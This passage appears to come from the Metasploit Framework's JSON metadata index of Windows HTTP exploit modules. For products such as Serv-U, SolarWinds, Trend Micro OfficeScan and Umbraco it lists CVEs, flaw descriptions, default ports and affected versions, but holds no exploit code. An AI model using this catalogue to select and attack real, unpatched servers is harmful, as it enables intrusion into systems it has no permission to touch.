"description": "This module exploits an unauthenticated remote command execution vulnerability\n in the console component of Serviio Media Server versions 1.4 to 1.8 on\n Windows operating systems.\n\n The console service (on port 23423 by default) exposes a REST API which\n which does not require authentication.\n\n The 'action' API endpoint does not sufficiently sanitize user-supplied data\n in the 'VIDEO' parameter of the 'checkStreamUrl' method. This parameter is\n used in a call to cmd.exe resulting in execution of arbitrary commands.\n\n This module has been tested successfully on Serviio Media Server versions\n 1.4.0, 1.5.0, 1.6.0 and 1.8.0 on Windows 7.",
"references": [
"OSVDB-41961",
"PACKETSTORM-142387",
"URL-http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5408.php",
"URL-https://blogs.securiteam.com/index.php/archives/3094"
],
"platform": "Windows",
"arch": "",
"rport": 23423,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/windows/http/serviio_checkstreamurl_cmd_exec.rb",
"is_install_path": true,
"ref_name": "windows/http/serviio_checkstreamurl_cmd_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/servu_session_cookie": {
"name": "Rhinosoft Serv-U Session Cookie Buffer Overflow",
"full_name": "exploit/windows/http/servu_session_cookie",
"rank": 400,
"disclosure_date": "2009-11-01",
"type": "exploit",
"author": [
"Nikolas Rangos <nikolaos@rangos.de>",
"M.Yanagishita <megumi1990@gmail.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a buffer overflow in Rhinosoft Serv-U 9.0.0.5.\n Sending a specially crafted POST request with an overly long session cookie\n string, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2009-4006",
"OSVDB-59772",
"URL-http://rangos.de/ServU-ADV.txt"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2003 SP2 English (NX)",
"Windows 2000 SP4 and XP SP3 English (SEH)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/servu_session_cookie.rb",
"is_install_path": true,
"ref_name": "windows/http/servu_session_cookie",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/shoutcast_format": {
"name": "SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow",
"full_name": "exploit/windows/http/shoutcast_format",
"rank": 200,
"disclosure_date": "2004-12-23",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"mandragore <mandragore@gmail.com>"
],
"description": "This module exploits a format string vulnerability in the\n Nullsoft SHOUTcast server for Windows. The vulnerability is\n triggered by requesting a file path that contains format\n string specifiers. This vulnerability was discovered by\n Tomasz Trojanowski and Damian Put.",
"references": [
"CVE-2004-1373",
"OSVDB-12585",
"BID-12096"
],
"platform": "Windows",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Windows NT SP5/SP6a English",
"Windows 2000 English ALL",
"Windows XP Pro SP0/SP1 English",
"Windows 2003 Server English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/shoutcast_format.rb",
"is_install_path": true,
"ref_name": "windows/http/shoutcast_format",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/shttpd_post": {
"name": "SHTTPD URI-Encoded POST Request Overflow",
"full_name": "exploit/windows/http/shttpd_post",
"rank": 200,
"disclosure_date": "2006-10-06",
"type": "exploit",
"author": [
"LMH <lmh@info-pull.com>",
"hdm <x@hdm.io>",
"skOd"
],
"description": "This module exploits a stack buffer overflow in SHTTPD <= 1.34.\n The vulnerability is caused due to a boundary error within the\n handling of POST requests. Based on an original exploit by skOd\n but using a different method found by hdm.",
"references": [
"CVE-2006-5216",
"OSVDB-29565",
"URL-http://shttpd.sourceforge.net",
"BID-20393"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows NT English SP5-SP6",
"Windows 2000 Spanish SP4",
"Windows 2000 French SP4",
"Windows 2000 English SP0-SP4",
"Windows 2000 French SP0-SP4",
"Windows 2003 Server English SP0-SP1",
"Windows XP German SP2",
"Windows XP German SP1",
"Windows XP English SP2",
"Windows XP English SP0-SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/shttpd_post.rb",
"is_install_path": true,
"ref_name": "windows/http/shttpd_post",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/solarwinds_fsm_userlogin": {
"name": "Solarwinds Firewall Security Manager 6.6.5 Client Session Handling Vulnerability",
"full_name": "exploit/windows/http/solarwinds_fsm_userlogin",
"rank": 600,
"disclosure_date": "2015-03-13",
"type": "exploit",
"author": [
"rgod",
"mr_me <steventhomasseeley@gmail.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits multiple vulnerabilities found in Solarwinds Firewall Security Manager\n 6.6.5. The first vulnerability is an authentication bypass via the Change Advisor interface\n due to a user-controlled session.putValue API in userlogin.jsp, allowing the attacker to set\n the 'username' attribute before authentication. The second problem is that the settings-new.jsp\n file will only check the 'username' attribute before authorizing the 'uploadFile' action,\n which can be exploited and allows the attacker to upload a fake xls host list file to the\n server, and results in arbitrary code execution under the context of SYSTEM.\n\n Depending on the installation, by default the Change Advisor web server is listening on port\n 48080 for an express install. Otherwise, this service may appear on port 8080.\n\n Solarwinds has released a fix for this vulnerability as FSM-v6.6.5-HotFix1.zip, noted in the\n references for this module.",
"references": [
"CVE-2015-2284",
"OSVDB-81634",
"ZDI-15-107",
"URL-http://downloads.solarwinds.com/solarwinds/Release/HotFix/FSM-v6.6.5-HotFix1.zip"
],
"platform": "Windows",
"arch": "",
"rport": 48080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Solarwinds Firewall Security Manager 6.6.5"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb",
"is_install_path": true,
"ref_name": "windows/http/solarwinds_fsm_userlogin",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/solarwinds_storage_manager_sql": {
"name": "Solarwinds Storage Manager 5.1.0 SQL Injection",
"full_name": "exploit/windows/http/solarwinds_storage_manager_sql",
"rank": 600,
"disclosure_date": "2011-12-07",
"type": "exploit",
"author": [
"r <r@b13$>",
"muts",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a SQL injection found in Solarwinds Storage Manager\n login interface. It will send a malicious SQL query to create a JSP file\n under the web root directory, and then let it download and execute our malicious\n executable under the context of SYSTEM.",
"references": [
"OSVDB-81634",
"EDB-18818",
"URL-http://ddilabs.blogspot.com/2012/02/solarwinds-storage-manager-server-sql.html",
"URL-http://www.solarwinds.com/documentation/storage/storagemanager/docs/ReleaseNotes/vulnerability.htm"
],
"platform": "Windows",
"arch": "",
"rport": 9000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb",
"is_install_path": true,
"ref_name": "windows/http/solarwinds_storage_manager_sql",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/sonicwall_scrutinizer_sqli": {
"name": "Dell SonicWALL (Plixer) Scrutinizer 9 SQL Injection",
"full_name": "exploit/windows/http/sonicwall_scrutinizer_sqli",
"rank": 600,
"disclosure_date": "2012-07-22",
"type": "exploit",
"author": [
"muts",
"Devon Kearns",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Dell SonicWall Scrutinizer.\n While handling the 'q' parameter, the PHP application does not properly filter\n the user-supplied data, which can be manipulated to inject SQL commands, and\n then gain remote code execution. Please note that authentication is NOT needed\n to exploit this vulnerability.",
"references": [
"CVE-2012-2962",
"OSVDB-84232",
"EDB-20033",
"BID-54625",
"URL-http://www.sonicwall.com/shared/download/Dell_SonicWALL_Scrutinizer_Service_Bulletin_for_SQL_injection_vulnerability_CVE.pdf"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Dell SonicWall Scrutinizer 9.5.1 or older"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb",
"is_install_path": true,
"ref_name": "windows/http/sonicwall_scrutinizer_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/steamcast_useragent": {
"name": "Streamcast HTTP User-Agent Buffer Overflow",
"full_name": "exploit/windows/http/steamcast_useragent",
"rank": 200,
"disclosure_date": "2008-01-24",
"type": "exploit",
"author": [
"LSO <lso@hushmail.com>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack buffer overflow in Streamcast <= 0.9.75. By sending\n an overly long User-Agent in an HTTP GET request, an attacker may be able to\n execute arbitrary code.",
"references": [
"CVE-2008-0550",
"OSVDB-42670",
"URL-http://aluigi.altervista.org/adv/steamcazz-adv.txt",
"BID-33898"
],
"platform": "Windows",
"arch": "",
"rport": 8000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro English All",
"Windows XP Pro SP0/SP1 English"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/http/steamcast_useragent.rb",
"is_install_path": true,
"ref_name": "windows/http/steamcast_useragent",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/sws_connection_bof": {
"name": "Simple Web Server Connection Header Buffer Overflow",
"full_name": "exploit/windows/http/sws_connection_bof",
"rank": 300,
"disclosure_date": "2012-07-20",
"type": "exploit",
"author": [
"mr.pr0n",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in Simple Web Server 2.2 rc2. A remote user\n can send a long string data in the Connection Header to causes an overflow on the\n stack when function vsprintf() is used, and gain arbitrary code execution. The\n module has been tested successfully on Windows 7 SP1 and Windows XP SP3.",
"references": [
"OSVDB-84310",
"EDB-19937",
"URL-http://ghostinthelab.wordpress.com/2012/07/19/simplewebserver-2-2-rc2-remote-buffer-overflow-exploit/"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"SimpleWebServer 2.2-rc2 / Windows XP SP3 / Windows 7 SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/sws_connection_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/sws_connection_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/sybase_easerver": {
"name": "Sybase EAServer 5.2 Remote Stack Buffer Overflow",
"full_name": "exploit/windows/http/sybase_easerver",
"rank": 200,
"disclosure_date": "2005-07-25",
"type": "exploit",
"author": [
"Unknown"
],
"description": "This module exploits a stack buffer overflow in the Sybase EAServer Web\n Console. The offset to the SEH frame appears to change depending\n on what version of Java is in use by the remote server, making this\n exploit somewhat unreliable.",
"references": [
"CVE-2005-2297",
"OSVDB-17996",
"BID-14287"
],
"platform": "Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Windows All - Sybase EAServer 5.2 - jdk 1.3.1_11",
"Windows All - Sybase EAServer 5.2 - jdk 1.3.?.?",
"Windows All - Sybase EAServer 5.2 - jdk 1.4.2_06",
"Windows All - Sybase EAServer 5.2 - jdk 1.4.1_02"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/sybase_easerver.rb",
"is_install_path": true,
"ref_name": "windows/http/sybase_easerver",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/syncbreeze_bof": {
"name": "Sync Breeze Enterprise GET Buffer Overflow",
"full_name": "exploit/windows/http/syncbreeze_bof",
"rank": 500,
"disclosure_date": "2017-03-15",
"type": "exploit",
"author": [
"Daniel Teixeira",
"Andrew Smith",
"Owais Mehtab",
"Milton Valencia (wetw0rk)"
],
"description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of Sync Breeze Enterprise v9.4.28, v10.0.28,\n and v10.1.16, caused by improper bounds checking of the request in\n HTTP GET and POST requests sent to the built-in web server. This\n module has been tested successfully on Windows 7 SP1 x86.",
"references": [
"CVE-2017-14980"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Sync Breeze Enterprise v9.4.28",
"Sync Breeze Enterprise v10.0.28",
"Sync Breeze Enterprise v10.1.16"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/http/syncbreeze_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/syncbreeze_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/sysax_create_folder": {
"name": "Sysax Multi Server 5.64 Create Folder Buffer Overflow",
"full_name": "exploit/windows/http/sysax_create_folder",
"rank": 300,
"disclosure_date": "2012-07-29",
"type": "exploit",
"author": [
"Craig Freyman",
"Matt \"hostess\" Andreko"
],
"description": "This module exploits a stack buffer overflow in the create folder function in\n Sysax Multi Server 5.64. This issue was fixed in 5.66. In order to trigger the\n vulnerability valid credentials with the create folder permission must be provided.\n The HTTP option must be enabled on Sysax too.\n\n This module will log into the server, get a SID token, find the root folder, and\n then proceed to exploit the server. Successful exploits result in SYSTEM access.\n This exploit works on XP SP3, and Server 2003 SP1-SP2.",
"references": [
"CVE-2012-6530",
"OSVDB-82329",
"EDB-20676",
"EDB-18420",
"URL-http://www.pwnag3.com/2012/01/sysax-multi-server-550-exploit.html",
"URL-http://www.mattandreko.com/2012/07/sysax-564-http-remote-buffer-overflow.html"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows XP SP3 / Sysax Multi Server 5.64",
"Windows 2003 SP1-SP2 / Sysax Multi Server 5.64"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/sysax_create_folder.rb",
"is_install_path": true,
"ref_name": "windows/http/sysax_create_folder",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/trackercam_phparg_overflow": {
"name": "TrackerCam PHP Argument Buffer Overflow",
"full_name": "exploit/windows/http/trackercam_phparg_overflow",
"rank": 200,
"disclosure_date": "2005-02-18",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a simple stack buffer overflow in the\n TrackerCam web server. All current versions of this software\n are vulnerable to a large number of security issues. This\n module abuses the directory traversal flaw to gain\n information about the system and then uses the PHP overflow\n to execute arbitrary code.",
"references": [
"CVE-2005-0478",
"OSVDB-13953",
"OSVDB-13955",
"BID-12592",
"URL-http://aluigi.altervista.org/adv/tcambof-adv.txt"
],
"platform": "Windows",
"arch": "",
"rport": 8090,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows 2000 English",
"Windows XP English SP0/SP1",
"Windows NT 4.0 SP4/SP5/SP6"
],
"mod_time": "2017-08-14 01:40:17 +0000",
"path": "/modules/exploits/windows/http/trackercam_phparg_overflow.rb",
"is_install_path": true,
"ref_name": "windows/http/trackercam_phparg_overflow",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/trackit_file_upload": {
"name": "Numara / BMC Track-It! FileStorageService Arbitrary File Upload",
"full_name": "exploit/windows/http/trackit_file_upload",
"rank": 600,
"disclosure_date": "2014-10-07",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits an arbitrary file upload vulnerability in Numara / BMC Track-It!\n v8 to v11.X.\n The application exposes the FileStorageService .NET remoting service on port 9010\n (9004 for version 8) which accepts unauthenticated uploads. This can be abused by\n a malicious user to upload a ASP or ASPX file to the web root leading to arbitrary\n code execution as NETWORK SERVICE or SYSTEM.\n This module has been tested successfully on versions 11.3.0.355, 10.0.51.135, 10.0.50.107,\n 10.0.0.143, 9.0.30.248 and 8.0.2.51.",
"references": [
"CVE-2014-4872",
"OSVDB-112741",
"US-CERT-VU-121036",
"URL-https://seclists.org/fulldisclosure/2014/Oct/34"
],
"platform": "Windows",
"arch": "x86",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Numara / BMC Track-It! v9 to v11.X - Windows"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/http/trackit_file_upload.rb",
"is_install_path": true,
"ref_name": "windows/http/trackit_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/trendmicro_officescan": {
"name": "Trend Micro OfficeScan Remote Stack Buffer Overflow",
"full_name": "exploit/windows/http/trendmicro_officescan",
"rank": 400,
"disclosure_date": "2007-06-28",
"type": "exploit",
"author": [
"toto"
],
"description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan\n cgiChkMasterPwd.exe (running with SYSTEM privileges).",
"references": [
"CVE-2008-1365",
"OSVDB-42499"
],
"platform": "Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows 2000 - Trend Micro OfficeScan 7.3.0.1293)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/trendmicro_officescan.rb",
"is_install_path": true,
"ref_name": "windows/http/trendmicro_officescan",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/trendmicro_officescan_widget_exec": {
"name": "Trend Micro OfficeScan Remote Code Execution",
"full_name": "exploit/windows/http/trendmicro_officescan_widget_exec",
"rank": 600,
"disclosure_date": "2017-10-07",
"type": "exploit",
"author": [
"mr_me <mr_me@offensive-security.com>",
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a\n terminal command under the context of the web server user.\n\n The specific flaw exists within the management interface, which listens on TCP port 443 by default. The Trend Micro Officescan product\n has a widget feature which is implemented with PHP. Talker.php takes ack and hash parameters but doesn't validate these values, which\n leads to an authentication bypass for the widget. Proxy.php files under the mod TMCSS folder take multiple parameters but the process\n does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities,\n unauthenticated users can execute a terminal command under the context of the web server user.",
"references": [
"CVE-2017-11394",
"URL-https://pentest.blog/one-ring-to-rule-them-all-same-rce-on-multiple-trend-micro-products/",
"URL-http://www.zerodayinitiative.com/advisories/ZDI-17-521/"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting",
"OfficeScan 11",
"OfficeScan XG"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/http/trendmicro_officescan_widget_exec.rb",
"is_install_path": true,
"ref_name": "windows/http/trendmicro_officescan_widget_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/ultraminihttp_bof": {
"name": "Ultra Mini HTTPD Stack Buffer Overflow",
"full_name": "exploit/windows/http/ultraminihttp_bof",
"rank": 300,
"disclosure_date": "2013-07-10",
"type": "exploit",
"author": [
"superkojiman",
"PsychoSpy <neinwechter@gmail.com>",
"OJ Reeves <oj@buffered.io>"
],
"description": "This module exploits a stack based buffer overflow in Ultra Mini HTTPD 1.21,\n allowing remote attackers to execute arbitrary code via a long resource name in an HTTP\n request. This exploit has to deal with the fact that the application's request handler\n thread is terminated after 60 seconds by a \"monitor\" thread. To do this, it allocates\n some RWX memory, copies the payload to it and creates another thread. When done, it\n terminates the current thread so that it doesn't crash and hence doesn't bring down\n the process with it.",
"references": [
"OSVDB-95164",
"EDB-26739",
"CVE-2013-5019",
"BID-61130"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"v1.21 - Windows Server 2000",
"v1.21 - Windows XP SP0",
"v1.21 - Windows XP SP2/SP3",
"v1.21 - Windows Server 2003 (Enterprise)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/ultraminihttp_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/ultraminihttp_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/umbraco_upload_aspx": {
"name": "Umbraco CMS Remote Command Execution",
"full_name": "exploit/windows/http/umbraco_upload_aspx",
"rank": 600,
"disclosure_date": "2012-06-28",
"type": "exploit",
"author": [
"Toby Clarke",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module can be used to execute a payload on Umbraco CMS 4.7.0.378.\n The payload is uploaded as an ASPX script by sending a specially crafted\n SOAP request to codeEditorSave.asmx, which permits unauthorized file upload\n via the SaveDLRScript operation. SaveDLRScript is also subject to a path\n traversal vulnerability, allowing code to be placed into the web-accessible\n /umbraco/ directory.\n\n The module writes, executes and then overwrites an ASPX script; note that\n though the script content is removed, the file remains on the target. Automatic\n cleanup of the file is intended if a meterpreter payload is used.\n\n This module has been tested successfully on Umbraco CMS 4.7.0.378 on a Windows\n 7 32-bit SP1. In this scenario, the \"IIS APPPOOL\\ASP.NET v4.0\" user must have\n write permissions on the Windows Temp folder.",
"references": [
"OSVDB-83765",
"EDB-19671",
"URL-http://blog.gdssecurity.com/labs/2012/7/3/find-bugs-faster-with-a-webmatrix-local-reference-instance.html",
"URL-http://umbraco.codeplex.com/workitem/18192"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Umbraco CMS 4.7.0.378 / Microsoft Windows 7 Professional 32-bit SP1"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/http/umbraco_upload_aspx.rb",
"is_install_path": true,
"ref_name": "windows/http/umbraco_upload_aspx",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/vmware_vcenter_chargeback_upload": {
"name": "VMware vCenter Chargeback Manager ImageUploadServlet Arbitrary File Upload",
"full_name": "exploit/windows/http/vmware_vcenter_chargeback_upload",
"rank": 600,
"disclosure_date": "2013-05-15",
"type": "exploit",
"author": [
"Andrea Micalizzi",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a code execution flaw in VMware vCenter Chargeback Manager,\n where the ImageUploadServlet servlet allows unauthenticated file upload. The files\n are uploaded to the /cbmui/images/ web path, where JSP code execution is allowed.\n The module has been tested successfully on VMware vCenter Chargeback Manager 2.0.1\n on Windows 2003 SP2.",
"references": [
"CVE-2013-3520",
"OSVDB-94188",
"BID-60484",
"ZDI-13-147"
],
"platform": "Windows",
"arch": "x86",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"VMware vCenter Chargeback Manager 2.0.1 / Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb",
"is_install_path": true,
"ref_name": "windows/http/vmware_vcenter_chargeback_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/vxsrchs_bof": {
"name": "VX Search Enterprise GET Buffer Overflow",
"full_name": "exploit/windows/http/vxsrchs_bof",
"rank": 500,
"disclosure_date": "2017-03-15",
"type": "exploit",
"author": [
"Daniel Teixeira"
],
"description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of VX Search Enterprise v9.5.12, caused by\n improper bounds checking of the request path in HTTP GET requests\n sent to the built-in web server. This module has been tested\n successfully on Windows 7 SP1 x86.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"VX Search Enterprise v9.5.12"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/vxsrchs_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/vxsrchs_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/webster_http": {
"name": "Webster HTTP Server GET Buffer Overflow",
"full_name": "exploit/windows/http/webster_http",
"rank": 200,
"disclosure_date": "2002-12-02",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This exploits a stack buffer overflow in the Webster HTTP server.\n The server and source code was released within an article from\n the Microsoft Systems Journal in February 1996 titled \"Write a\n Simple HTTP-based Server Using MFC and Windows Sockets\".",
"references": [
"CVE-2002-2268",
"OSVDB-44106",
"BID-6289",
"URL-http://www.microsoft.com/msj/archive/s25f.aspx",
"URL-http://www.netdave.com/webster/webster.htm"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows XP SP0",
"Debug"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/http/webster_http.rb",
"is_install_path": true,
"ref_name": "windows/http/webster_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/xampp_webdav_upload_php": {
"name": "XAMPP WebDAV PHP Upload",
"full_name": "exploit/windows/http/xampp_webdav_upload_php",
"rank": 600,
"disclosure_date": "2012-01-14",
"type": "exploit",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module exploits weak WebDAV passwords on XAMPP servers.\n It uses supplied credentials to upload a PHP payload and\n execute it.",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-08-20 18:08:19 +0000",
"path": "/modules/exploits/windows/http/xampp_webdav_upload_php.rb",
"is_install_path": true,
"ref_name": "windows/http/xampp_webdav_upload_php",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_windows/http/xitami_if_mod_since": {
"name": "Xitami 2.5c2 Web Server If-Modified-Since Overflow",
"full_name": "exploit/windows/http/xitami_if_mod_since",
"rank": 200,
"disclosure_date": "2007-09-24",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack buffer overflow in the iMatix Corporation\n Xitami Web Server. If a malicious user sends an\tIf-Modified-Since\n header containing an overly long string, it may be possible to\n execute a payload remotely. Due to size constraints, this module uses\n the Egghunter technique.",
"references": [
"CVE-2007-5067",
"OSVDB-40594",
"OSVDB-40595",
"BID-25772",
"EDB-4450"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"xigui32.exe Universal",
"xitami.exe Universal"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/http/xitami_if_mod_since.rb",
"is_install_path": true,
"ref_name": "windows/http/xitami_if_mod_since",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/zenworks_assetmgmt_uploadservlet": {
"name": "Novell ZENworks Asset Management Remote Execution",
"full_name": "exploit/windows/http/zenworks_assetmgmt_uploadservlet",
"rank": 600,
"disclosure_date": "2011-11-02",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a path traversal flaw in Novell ZENworks Asset Management\n 7.5. By exploiting the CatchFileServlet, an attacker can upload a malicious file\n outside of the MalibuUploadDirectory and then make a secondary request that allows\n for arbitrary code execution.",
"references": [
"CVE-2011-2653",
"OSVDB-77583",
"BID-50966",
"ZDI-11-342",
"URL-http://download.novell.com/Download?buildid=hPvHtXeNmCU~"
],
"platform": "Java",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Java Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/zenworks_assetmgmt_uploadservlet.rb",
"is_install_path": true,
